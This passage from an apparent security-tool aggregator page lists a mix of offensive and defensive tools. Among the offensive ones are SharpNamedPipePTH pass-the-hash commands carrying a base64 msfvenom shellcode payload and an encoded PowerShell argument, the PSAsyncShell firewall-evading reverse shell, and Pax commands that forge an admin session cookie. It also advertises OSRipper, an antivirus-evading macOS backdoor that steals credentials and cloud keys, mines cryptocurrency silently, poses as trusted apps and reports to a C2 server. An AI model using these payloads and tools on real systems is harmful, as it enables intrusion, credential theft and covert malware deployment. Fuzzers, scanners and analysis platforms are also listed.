
#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])

#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)

IKEY

#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()

#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

Log

#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()

Debug

#Activate debug mode
flipper.debug.on()

#Deactivate debug mode
flipper.debug.off()

Onewire

#Search
response = flipper.onewire.search()

I2C

#Get
response = flipper.i2c.get()

Input

#Input dump
dump = flipper.input.dump()

#Send input
flipper.input.send("up", "press")

Optimizations

Feel free to contribute in any way

  • Queue Thread orchestrator (check dev branch)
  • Implement all the cli functions
  • Async SubGhz Chat (check dev branch)

License

MIT

Buy me a pint

ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7

ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54

BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat

Contacts

  • Discord: white_rabbit#4124
  • Twitter: @nic_whr
  • GPG: 0x94EDEADC


OpenStego Free Steganography Solution 0.8.5

OpenStego is a tool implemented in Java for generic steganography, with support for password-based encryption of the data. It supports plugins for various steganographic algorithms (currently, only Least Significant Bit algorithm is supported for images).

GNUnet P2P Framework 0.17.6

GNUnet is a peer-to-peer framework with focus on providing security. All peer-to-peer messages in the network are confidential and authenticated. The framework provides a transport abstraction layer and can currently encapsulate the network traffic in UDP (IPv4 and IPv6), TCP (IPv4 and IPv6), HTTP, or SMTP messages. GNUnet supports accounting to provide contributing nodes with better service. The primary service build on top of the framework is anonymous file sharing.

SharpNamedPipePTH - Pass The Hash To A Named Pipe For Token Impersonation


This project is a C# tool to use Pass-the-Hash for authentication on a local Named Pipe for user Impersonation. You need a local administrator or SEImpersonate rights to use this. There is a blog post for explanation:

https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/

It is heavily based on the code from the project Sharp-SMBExec.

I faced certain Offensive Security project situations in the past, where I already had the NTLM-Hash of a low privileged user account and needed a shell for that user on the current compromised system - but that was not possible with the current public tools. Imagine two more facts for a situation like that - the NTLM Hash could not be cracked and there is no process of the victim user to execute shellcode in it or to migrate into that process. This may sound like an absurd edge-case for some of you. I still experienced that multiple times. Not only in one engagement I spend a lot of time searching for the right tool/technique in that specific situation.

My personal goals for a tool/technique were:

  • Fully featured shell or C2-connection as the victim user-account
  • It must to able to also Impersonate low privileged accounts - depending on engagement goals it might be needed to access a system with a specific user such as the CEO, HR-accounts, SAP-administrators or others
  • The tool can be used as C2-module

The impersonated user unfortunately has no network authentication allowed, as the new process is using an Impersonation Token which is restricted. So you can only use this technique for local actions with another user.

There are two ways to use SharpNamedPipePTH. Either you can execute a binary (with or without arguments):

SharpNamedPipePTH.exe username:testing hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:C:\windows\system32\cmd.exe

SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" arguments:"-nop -w 1 -sta -enc bgBvAHQAZQBwAGEAZAAuAGUAeABlAAoA"

Or you can execute shellcode as the other user:

SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 shellcode:/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY21kLmV4ZQA=

Which is msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=threadmsfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread | base64 -w0.

I'm not happy with the shellcode execution yet, as it's currently spawning notepad as the impersonated user and injects shellcode into that new process via D/Invoke CreateRemoteThread Syscall. I'm still looking for possibility to spawn a process in the background or execute shellcode without having a process of the target user for memory allocation.



PSAsyncShell - PowerShell Asynchronous TCP Reverse Shell


PSAsyncShell is an Asynchronous TCP Reverse Shell written in pure PowerShell.

Unlike other reverse shells, all the communication and execution flow is done asynchronously, allowing to bypass some firewalls and some countermeasures against this kind of remote connections.

Additionally, this tool features command history, screen wiping, file uploading and downloading, information splitting through chunks and reverse Base64 URL encoded traffic.


Requirements

  • PowerShell 4.0 or greater

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/PSAsyncShell

Usage

.\PSAsyncShell.ps1 -h

____ ____ _ ____ _ _ _
| _ \/ ___| / \ ___ _ _ _ __ ___/ ___|| |__ ___| | |
| |_) \___ \ / _ \ / __| | | | '_ \ / __\___ \| '_ \ / _ \ | |
| __/ ___) / ___ \\__ \ |_| | | | | (__ ___) | | | | __/ | |
|_| |____/_/ \_\___/\__, |_| |_|\___|____/|_| |_|\___|_|_|
|___/

---------------------- by @JoelGMSec -----------------------

Info: This tool helps you to get a remote shell
over asynchronous TCP to bypass firewalls

Usage: .\PSAsyncShell.ps1 -s -p listen_port
Listen for a new connection from the client

.\PSAsyncShell.ps1 -c server_ip server_port
Connect the client to a PSAsyncShell server

Warning: All info betwen parts will be sent unencrypted
Download & Upload functions don't use MultiPart

The detailed guide of use can be found at the following link:

https://darkbyte.net/psasyncshell-bypasseando-firewalls-con-una-shell-tcp-asincrona

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gรกmez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



Pax - CLI Tool For PKCS7 Padding Oracle Attacks


Exploit padding oracles for fun and profit!

Pax (PAdding oracle eXploiter) is a tool for exploiting padding oracles in order to:

  1. Obtain plaintext for a given piece of CBC encrypted data.
  2. Obtain encrypted bytes for a given piece of plaintext, using the unknown encryption algorithm used by the oracle.

This can be used to disclose encrypted session information, and often to bypass authentication, elevate privileges and to execute code remotely by encrypting custom plaintext and writing it back to the server.

As always, this tool should only be used on systems you own and/or have permission to probe!


Installation

Download from releases, or install with Go:

go get -u github.com/liamg/pax/cmd/pax

Example Usage

If you find a suspected oracle, where the encrypted data is stored inside a cookie named SESS, you can use the following:

pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

This will hopefully give you some plaintext, perhaps something like:

 {"user_id": 456, "is_admin": false}

It looks like you could elevate your privileges here!

You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:

pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

This will spit out another base64 encoded set of encrypted data, perhaps something like:

dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Now you can open your browser and set the value of the SESS cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.

How does this work?

The following are great guides on how this attack works:



SCodeScanner - Stands For Source Code Scanner Where The User Can Scans The Source Code For Finding The Critical Vulnerabilities


SCodeScanner stands for Source Code scanner where the user can scans the source code for finding the Critical Vulnerabilities. The main objective for this scanner is to find the vulnerabilities inside the source code before code gets published in Prod.


Features

  1. Supported PHP Language
  2. Supported YAML Language
  3. Pass results to bug tracking services like Jira also Slack (Sending files to group to multiple people at once).
  4. Gives results in JSON format, which can easily be used to any other program.
  5. Works with Rules. We only need to create some rules which the target rule is not present in php/yaml directory.
  6. Rules that can scan advance patterns

Achievements

SCodeScanner received 5 CVEs for finding vulnerabilities in multiple CMS plugins.

  • CVE-2022-1465
  • CVE-2022-1474
  • CVE-2022-1527
  • CVE-2022-1532
  • CVE-2022-1604

How to run?

  • Download the repository -
  • Run pip3 install -r requirements.txt
  • And run python3 scscanner.py --help

Feedback/Imporvements

I would love to hear your feedback on this tool. Open issues if you found any. And open PR request if you have something.

Contact

Utkarsh Agrawal
Website



OSRipper - AV Evading OSX Backdoor And Crypter Framework


OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows.

You can also PM me on discord for support or to ask for new features SubGlitch1#2983


Features

  • FUD (for macOS)
  • Cloacks as an official app (Microsoft, ExpressVPN etc)
  • Dumps; Sys info, Browser History, Logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens swiftbelt)
  • Encrypted communications
  • Rootkit-like Behaviour
  • Every Backdoor generated is entirely unique

Description

Please check the wiki for information on how OSRipper functions (which changes extremely frequently)

https://github.com/SubGlitch1/OSRipper/wiki

Here are example backdoors which were generated with OSRipper




ย macOS .apps will look like this on vt

Getting Started

Dependencies

You need python. If you do not wish to download python you can download a compiled release. The python dependencies are specified in the requirements.txt file.

Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners.

Installing

Linux

apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

Windows

git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3

Executing program

Only this

sudo python3 main.py

Contributing

Please feel free to fork and open pull repuests. Suggestions/critisizm are appreciated as well

Roadmap

v0.1

  • โœ…Get down detection to 0/26 on antiscan.me
  • โœ…Add Changelog
  • โœ…Daemonise Backdoor
  • โœ…Add Crypter
  • โœ…Add More Backdoor templates
  • โœ…Get down detection to at least 0/68 on VT (for mac malware)

v0.2

  • โœ…Add AntiVM
  • [] Implement tor hidden services
  • โœ…Add Logger
  • โœ…Add Password stealer
  • [] Add KeyLogger
  • โœ…Add some new evasion options
  • โœ…Add SilentMiner
  • [] Make proper C2 server

v0.3

Coming soon

Help

Just open a issue and ill make sure to get back to you

Changelog

  • 0.2.1

    • OSRipper will now pull all information from the Target and send them to the c2 server over sockets. This includes information like browser history, passwords, system information, keys and etc.
  • 0.1.6

    • Proccess will now trojanise itself as com.apple.system.monitor and drop to /Users/Shared
  • 0.1.5

    • Added Crypter
  • 0.1.4

    • Added 4th Module
  • 0.1.3

    • Got detection on VT down to 0. Made the Proccess invisible
  • 0.1.2

    • Added 3rd module and listener
  • 0.1.1

    • Initial Release

License

MIT

Acknowledgments

Inspiration, code snippets, etc.

Support

I am very sorry to even write this here but my finances are not looking good right now. If you appreciate my work i would really be happy about any donation. You do NOT have to this is solely optional

BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T

Disclaimer

I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.



American Fuzzy Lop plus plus 4.03c

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork to Google's afl. It has more speed, more and better mutations, more and better instrumentation, custom module support, etc.

NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy


Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls.

The advantage of grabbing Syscalls dynamically is, that the signature of the Stubs is not included in the file and you don't have to worry about changing Windows versions.

To compile the shellcode execution template run the following:

nim c -d:release ShellcodeInject.nim

The result should look like this:



Zeek 5.0.2

Zeek is a powerful network analysis framework that is much different from the typical IDS you may know. While focusing on network security monitoring, Zeek provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Zeek has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyber-infrastructure. Zeek's user community includes major universities, research labs, supercomputing centers, and open-science communities. This is the source code release.

Kam1n0 - Assembly Analysis Platform


Kam1n0 v2.x is a scalable assembly management and analysis platform. It allows a user to first index a (large) collection of binaries into different repositories and provide different analytic services such as clone search and classification. It supports multi-tenancy access and management of assembly repositories by using the concept of Application. An application instance contains its own exclusive repository and provides a specialized analytic service. Considering the versatility of reverse engineering tasks, Kam1n0 v2.x server currently provides three different types of clone-search applications: Asm-Clone, Sym1n0, and Asm2Vec, and an executable classification based on Asm2Vec. New application type can be further added to the platform.


A user can create multiple application instances. An application instance can be shared among a specific group of users. The application repository read-write access and on-off status can be controlled by the application owner. Kam1n0 v2.x server can serve the applications concurrently using several shared resource pools.

Kam1n0 was developed by Steven H. H. Ding and Miles Q. Li under the supervision of Benjamin C. M. Fung of the Data Mining and Security Lab at McGill University in Canada. It won the second prize at the Hex-Rays Plug-In Contest 2015. If you find Kam1n0 useful, please cite our paper:

  • S. H. H. Ding, B. C. M. Fung, and P. Charland. Kam1n0: MapReduce-based Assembly Clone Search for Reverse Engineering. In Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (SIGKDD), pages 461-470, San Francisco, CA: ACM Press, August 2016.

  • S. H. H. Ding, B. C. M. Fung, and P. Charland. Asm2Vec: boosting static representation robustness for binary clone search against code obfuscation and compiler optimization. In Proceedings of the 40th IEEE Symposium on Security and Privacy (S&P), 18 pages, San Francisco, CA: IEEE Computer Society, May 2019.

Asm-Clone

Asm-Clone applications try to solve the efficient subgraph search problem (i.e. graph isomorphism problem) for assembly functions (<1.3s average query time and <30ms average index time with 2.3M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below).

  • Application Type: Asm-Clone
  • The original clone search service used in Kam1n0 v1.x.
  • Currently support Meta-PC, ARM, PowerPC, and TMS320c6 (experimental).
  • Support subgraph clone search within a certain assembly code family.
    • + Good interpretability of the result: breaks down to subgraphs.
    • + Accurate for searching within the given code family.
    • + Good for differing various patches or versions for big binaries.
    • - Relatively more sensitive to instruction set changes, optimizations, and obfuscation.
    • - Need to pre-define the syntax of the assembly code language.
    • - Need to have assembly code of the same chosen family in the repository.

ย 

Sym1n0

Semantic clone search by differentiated fuzz testing and constraint solving. An efficient and scalable dynamic-static hybrid approach (<1s average query time and <100ms average index time with 1.5M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below). Support visualization of abstract syntax graph.

  • Application Type: Sym1n0 (v2 only)
  • Clone search by both symbolic execution and concrete execution.
  • Differentiate functions based on their different I/O behavior.
  • Clone search conducted on the abstract syntax graph constructed from Vex IR (powered by LibVex).
    • + Clone search across different assembly code families.
      • For example, indexed x86 binaries but the query is ARM code.
    • + Subgraph clone search.
    • + Support a wide range of families throub LibVex.
      • x86, AMD64, MIPS32, MIPS64, PowerPC32, PowerPC64, ARM32, and ARM64.
    • + An efficient dynamic-static hybrid approach.
    • + Ideal for analyzing firmware compiled for different processors.
    • - Sensitive to heavy graph manipulation (such as a full flattening).
    • - Sensitive to large scale breakdown of basic block integrity.

ย 

Asm2Vec

Asm2Vec leverages representation learning. It understands the lexical semantic relationship of assembly code. For example, xmm* registers are semantically related to vector operations such as addps. memcpy is similar to strcpy. The graph below shows different assembly functions compiled from the same source code of gmpz_tdiv_r_2exp in libgmp. From left to right, the assembly functions are compiled with GCC O0 option, GCC O3 option, O-LLVM obfuscator Control Flow Graph, Flattening option, and LLVM obfuscator Bogus Control Flow Graph option. Asm2Vec can statically identify them as clones.

  • Leverage representation learning.
  • Understand the lexical semantic relationship of assembly code.
    • + State-of-the-art for clone search against heavy code obfuscation techniques.
      • (>0.8 accuracy for all options applied in O-LLVM, multiple iterations).
    • + State-of-the-art for clone search against code optimization.
      • (>0.8 accuracy between O0 and O3, >0.94 accuracy between O2 and O3)
    • + Even better result than the most recent dynamic approach.
    • + Much more efficient than recent dynamic approaches.
    • + Do not need to define the architecture. It self-learns by reading large volume of code.
    • + Static approach: efficient and scalable.
    • - No subgraphs.
    • - Assume the assembly code come from the same processor family.
    • - Static approach: cannot recognize jump table, etc.

ย 

Executable Classification

In this application, the user defines a set of software classes which are based on functional relatedness and provides binaries belong to each class. Then the system automatically groups functions into clusters in which functions are connected directly or indirectly by clone relation. The clusters that are discriminative for the classification are kept and serve as signatures of their classes. Given a target binary, the system shows the degree it belongs to each software class.


  • Use Asm2Vec as its function similarity computation model

    • + Provide interpretable classification results.
    • + Learn common characteristics (i.e., function clusters) of each class.
    • + Able to handle smaller and imbalanced datasets than an ordinary machine learning model.
    • - The limitation is that the assumption that binaries in the same class share some common functions must hold for the system to work.

    ย 

Platform Overview

The figure below shows the major UI components and functionalities of Kam1n0 v2.x. We adopt a material design. In general, each user has an application list, a running-job list, and a result file list.

  • Application list shows the application instances owned by the user and shared by the others.
  • Running-job list shows the running progress for a large query (such as chrome.dll) and indexing procedure.
  • Result file list displays the saved results. More details of the UI design can be found in our detailed tutorial.


Installation Instruction

The current release of Kam1n0 consists of two installers: the core server and IDA Pro plug-in.

Installer Included components Description
Kam1n0-Server.msi Core engine Main engine providing service for indexing and searching.
Workbench A user interface to manage the repositories and running service.
Web user interface Web user interface for searching/indexing binary files and assembly functions.
Visual C++ redistributable for VS 15 Dependecy for z3.
Kam1n0-IDA-Plugin.msi Plug-in Connectors and user interface.
PyPI wheels for Cefpython Rendering engine for the user interface.
PyPI and dependent wheels Package management for Python. Included for IDA 6.8 &6.9.

Installing the Kam1n0 Server

The Kam1n0 core engine is purely written in Java. You need the following dependencies:

  • [Required] The latest x64 11.x JRE/JDK distribution from Oracle.
  • [Optional] The latest version of IDA Pro with the idapython plug-in installed. The Python plug-in and runtime should have already been installed with IDA Pro. Reinstall IDA Pro if necessary.

Download the Kam1n0-Server.msi file from our release page. Follow the instructions to install the server. You will be prompted to select an installation path. IDA Pro is optional if the server does not have to deal with any disassembling. In other words, the client side uses the Kam1n0 plugin for IDA Pro. It is strongly suggested to have the IDA Pro installed with the Kam1n0 server. Kam1n0 server will automatically detect your IDA Pro by looking for the default application that you used to open .i64 file.

Installing the IDA Pro Plug-in

The Kam1n0 IDA Pro plug-in is written in Python for the logic and in HTML/JavaScript for the rendering. The following dependencies are required for its installation:

  • [Required] IDA Pro (>6.7) with the idapython plug-in installed. The Python plug-in and runtime should have already been installed with IDA Pro. Reinstall IDA Pro if necessary.

Next, download the Kam1n0-IDA-Plugin.msi installer from our release page. Follow the instructions to install the plug-in and runtime. Please note that the plug-in has to be installed in the IDA Pro plugins folder which is located at $IDA_PRO_PATH$/plugins. For example, on Windows, the path could be C:/Program Files (x86)/IDA 6.95/plugins. The installer will detect and validate the path.

Setting Up Kam1n0 on Ubuntu/Debian-based systems

  • Ensure you have the Oracle version of Java 11. (Not default-jdk in apt.)

    • Add Oracle's PPA and then update your package repository: sudo add-apt-repository ppa:webupd8team/java
      • If you encounter any errors (such as ~webupd8team not found), if you are on a proxy, make sure you set and export your http_proxy and https_proxy environment variables, and then try again with the -E option on sudo. Additionally, if you are getting a 'add-apt repository command not found error, try: sudo apt install -y software-properties-common.
    • Afterwards: sudo apt-get update, and sudo apt-get install oracle-java8-installer
      • Verify your Java version with java -version; you may need to manually set the JAVA_HOME environment variable (in /etc/environment), JAVA_HOME=/usr/lib/jvm/java-11-oracle
  • Download the latest release for Linux (Kam1n0-IDA-Plugin.tar.gz and Kam1n0-Server.tar.gz) from Kam1n0-Community.

  • Extract the two tarballs (i.e. tar โ€“xvzf Kam1n0-IDA-Plugin.tar.gz and tar โ€“xvzf Kam1n0-Server.tar.gz)

  • The Kam1n0-Server.tar.gz file will create the server directory.

  • Inside the server directory, you should see a file called kam1n0.properties, which is where you will set various configurations for kam1n0; this is very important.

  • Set kam1n0.data.path to where you would like your kam1n0-related data to be written to. We choose to put it in the same place that we keep our server. kam1n0.ida.home refers to where your IDA installation is located. Comment this line (and kam1n0.ida.batch, the line following) if you do not have IDA and don't plan to use kam1n0 for disassembly. For more (accurate) information about the kam1n0.properties file, see the kam1n0.properties.explained file.

  • Run kam1n0-server-workbench: java -jar kam1n0-server-workbench.jar. This should cause a window to pop up, which prompts you to actually start kam1n0. Alternatively, run kam1n0-server: java -jar kam1n0-server.jar --start. This starts the server from the console without a window.

  • To connect and use it, go to 127.0.0.1:8571 (the default port kam1n0 listens on should be 8571, but can be changed in kam1n0.properties) in your browser. You should see the pretty kam1n0 web UI. From there, follow the tutorial on the Kam1n0-Community repo if you do not know how to use kam1n0.

Backward Compatibility

The assembly code repositories and configuration files used in previous versions (<2.0.0) are no longer supported by the latest version. Please contact us if you need to migrate your old repositories.

Documentation

Development

Clone the latest stable branch (don't forget --recursive!):

git clone --recursive -b master2.x --single-branch https://github.com/McGill-DMaS/Kam1n0-Community

Importing the project.

IntelliJ: Import the root /kam1n0/kam1n0/ as a maven project. All the submodules will be loaded accordingly. EclipseEE: Add the cloned git repository to the git view. Import all maven projects from the git repository. You may need to modify the classpath to address any error. All the resources path are dynamically modified when running inside an IDE (through the kam1n0-resources submodule).

To build the project:

cd /kam1n0/kam1n0
mvn -DskipTests clean package
mvn -DskipTests package

The resulting binaries can be found in /kam1n0/build-bins/

To run the test code, you will need to first download chromedriver.exe from http://chromedriver.chromium.org/ and add its absolute path into an environment variable named webdriver.chrome.driver. It is also required that there is a chrome browser installed in the system. The test code will launch a browser instance to test the UI interfaces. The complete testing procedure will take approximately 3 hours.

cd /kam1n0/kam1n0
mvn -DskipTests clean package # you can skip this one if you already built the package
mvn -DskipTests package # you can skip this one if you already built the package
mvn -DforkMode=never test

These commands only compiles java with pre-compiled wheels of libvex and z3. It works out-of-the-box. The build of libvex and z3 is platform-dependent. We use a fork of libvex from Angr. More serious build scripts as well as installers for windows/linux can be found under /kam1n0-builds/

  • kam1n0: The server's source code.
  • kam1n0-builds: Installer source code and scripts to build the distribution.
  • kam1n0-clients: The clients' source code.

Binary Releases

We have a Jenkin server for contineous development and delivery. Latest stable release will be posted here. Periodically we will synchronize our internal experimental branch with this repository.

Licensing

The software was developed by Steven H. H. Ding, Miles Q. Li, and Benjamin C. M. Fung in the McGill Data Mining and Security Lab and Queen's L1NNA Research Laboratory in Canada. It is distributed under the Apache License Version 2.0. Please refer to LICENSE.txt for details.

Copyright 2014-2021 McGill University and the Researchers. All rights reserved.



CATS - REST API Fuzzer And Negative Testing Tool For OpenAPI Endpoints


REST API fuzzer and negative testing tool. Run thousands of self-healing API tests within minutes with no coding effort!

  • Comprehensive: tests are generated automatically based on a large number scenarios and cover every field and header
  • Intelligent: tests are generated based on data types and constraints; each Fuzzer have specific expectations depending on the scenario under test
  • Highly Configurable: high amount of customization: you can exclude specific Fuzzers, HTTP response codes, provide business context and a lot more
  • Self-Healing: as tests are generated, any OpenAPI spec change is picked up automatically
  • Simple to Learn: flat learning curve, with intuitive configuration and syntax
  • Fast: automatic process for write, run and report tests which covers thousands of scenarios within minutes

Overview

By using a simple and minimal syntax, with a flat learning curve, CATS (Contract Auto-generated Tests for Swagger) enables you to generate thousands of API tests within minutes with no coding effort. All tests are generated, run and reported automatically based on a pre-defined set of 89 Fuzzers. The Fuzzers cover a wide range of input data from fully random large Unicode values to well crafted, context dependant values based on the request data types and constraints. Even more, you can leverage the fact that CATS generates request payloads dynamically and write simple end-to-end functional tests.


Please check the Slicing Strategies section for making CATS run fast and comprehensive in the same time.

Tutorials on how to use CATS

This is a list of articles with step-by-step guides on how to use CATS:

Some bugs found by CATS

Installation

Homebrew

> brew tap endava/tap
> brew install cats

Manual

CATS is bundled both as an executable JAR or a native binary. The native binaries do not need Java installed.

After downloading your OS native binary, you can add it in classpath so that you can execute it as any other command line tool:

sudo cp cats /usr/local/bin/cats

You can also get autocomplete by downloading the cats_autocomplete script and do:

source cats_autocomplete

To get persistent autocomplete, add the above line in ~/.zshrc or ./bashrc, but make sure you put the fully qualified path for the cats_autocomplete script.

You can also check the cats_autocomplete source for alternative setup.

There is no native binary for Windows, but you can use the uberjar version. This requires Java 11+ to be installed.

You can run it as java -jar cats.jar.

Head to the releases page to download the latest versions: https://github.com/Endava/cats/releases.

Build

You can build CATS from sources on you local box. You need Java 11+. Maven is already bundled.

Before running the first build, please make sure you do a ./mvnw clean. CATS uses a fork ok OKHttpClient which will install locally under the 4.9.1-CATS version, so don't worry about overriding the official versions.

You can use the following Maven command to build the project:

./mvnw package -Dquarkus.package.type=uber-jar

cp target/

You will end up with a cats.jar in the target folder. You can run it wih java -jar cats.jar ....

You can also build native images using a GraalVM Java version.

./mvnw package -Pnative

Note: You will need to configure Maven with a Github PAT with read-packages scope to get some dependencies for the build.

Notes on Unit Tests

You may see some ERROR log messages while running the Unit Tests. Those are expected behaviour for testing the negative scenarios of the Fuzzers.

Running CATS

Blackbox mode

Blackbox mode means that CATS doesn't need any specific context. You just need to provide the service URL, the OpenAPI spec and most probably authentication headers.

> cats --contract=openapy.yaml --server=http://localhost:8080 --headers=headers.yml --blackbox

In blackbox mode CATS will only report ERRORs if the received HTTP response code is a 5XX. Any other mismatch between what the Fuzzer expects vs what the service returns (for example service returns 400 and service returns 200) will be ignored.

The blackbox mode is similar to a smoke test. It will quickly tell you if the application has major bugs that must be addressed immediately.

Context mode

The real power of CATS relies on running it in a non-blackbox mode also called context mode. Each Fuzzer has an expected HTTP response code based on the scenario under test and will also check if the response is matching the schema defined in the OpenAPI spec specific to that response code. This will allow you to tweak either your OpenAPI spec or service behaviour in order to create good quality APIs and documentation and also to avoid possible serious bugs.

Running CATS in context mode usually implies providing it a --refData file with resource identifiers specific to the business logic. CATS cannot create data on its own (yet), so it's important that any request field or query param that requires pre-existence of those entities/resources to be created in advance and added to the reference data file.

> cats --contract=openapy.yaml --server=http://localhost:8080 --headers=headers.yml --refData=referenceData.yml

Notes on skipped Tests

You may notice a significant number of tests marked as skipped. CATS will try to apply all Fuzzers to all fields, but this is not always possible. For example the BooleanFieldsFuzzer cannot be applied to String fields. This is why that test attempt will be marked as skipped. It was an intentional decision to also report the skipped tests in order to show that CATS actually tries all the Fuzzers on all the fields/paths/endpoints.

Additionally, CATS support a lot more arguments that allows you to restrict the number of fuzzers, provide timeouts, limit the number of requests per minute and so on.

Understanding how CATS works and reports results

CATS generates tests based on configured Fuzzers. Each Fuzzer has a specific scenario and a specific expected result. The CATS engine will run the scenario, get the result from the service and match it with the Fuzzer expected result. Depending on the matching outcome, CATS will report as follows:

  • INFO/SUCCESS is expected and documented behaviour. No need for action.
  • WARN is expected but undocumented behaviour or some misalignment between the contract and the service. This will ideally be actioned.
  • ERROR is abnormal/unexpected behaviour. This must be actioned.

CATS will iterate through all endpoints, all HTTP methods and all the associated requests bodies and parameters (including multiple combinations when dealing with oneOf/anyOf elements) and fuzz their values considering their defined data type and constraints. The actual fuzzing depends on the specific Fuzzer executed. Please see the list of fuzzers and their behaviour. There are also differences on how the fuzzing works depending on the HTTP method:

  • for methods with request bodies like POST, PUT the fuzzing will be applied at the request body data models level
  • for methods without request bodies like GET, DELETE the fuzzing will be applied at the URL parameters level

This means that for methods with request bodies (POST,PUT) that have also URL/path parameters, you need to supply the path parameters via urlParams or the referenceData file as failure to do so will result in Illegal character in path at index ... errors.

Interpreting Results

HTML_JS

HTML_JS is the default report produced by CATS. The execution report in placed a folder called cats-report/TIMESTAMP or cats-report depending on the --timestampReports argument. The folder will be created inside the current folder (if it doesn't exist) and for each run a new subfolder will be created with the TIMESTAMP value when the run started. This allows you to have a history of the runs. The report itself is in the index.html file, where you can:

  • filter test runs based on the result: All, Success, Warn and Error
  • filter based on the Fuzzer so that you can only see the runs for that specific Fuzzer
  • see summary with all the tests with their corresponding path against they were run, and the result
  • have ability to click on any tests and get details about the Scenario being executed, Expected Result, Actual result as well as request/response details

Along with the summary from index.html each individual test will have a specific TestXXX.html page with more details, as well as a json version of the test which can be latter replayed using > cats replay TestXXX.json.

Understanding the Result Reason values:

  • Unexpected Exception - reported as error; this might indicate a possible bug in the service or a corner case that is not handled correctly by CATS
  • Not Matching Response Schema - reported as a warn; this indicates that the service returns an expected response code and a response body, but the response body does not match the schema defined in the contract
  • Undocumented Response Code - reported as a warn; this indicates that the service returns an expected response code, but the response code is not documented in the contract
  • Unexpected Response Code - reported as an error; this indicates a possible bug in the service - the response code is documented, but is not expected for this scenario
  • Unexpected Behaviour - reported as an error; this indicates a possible bug in the service - the response code is neither documented nor expected for this scenario
  • Not Found - reported as an error in order to force providing more context; this indicates that CATS needs additional business context in order to run successfully - you can do this using the --refData and/or --urlParams arguments

This is the summary page:


And this is what you get when you click on a specific test:ย 



HTML_ONLY

This format is similar with HTML_JS, but you cannot do any filtering or sorting.

JUNIT

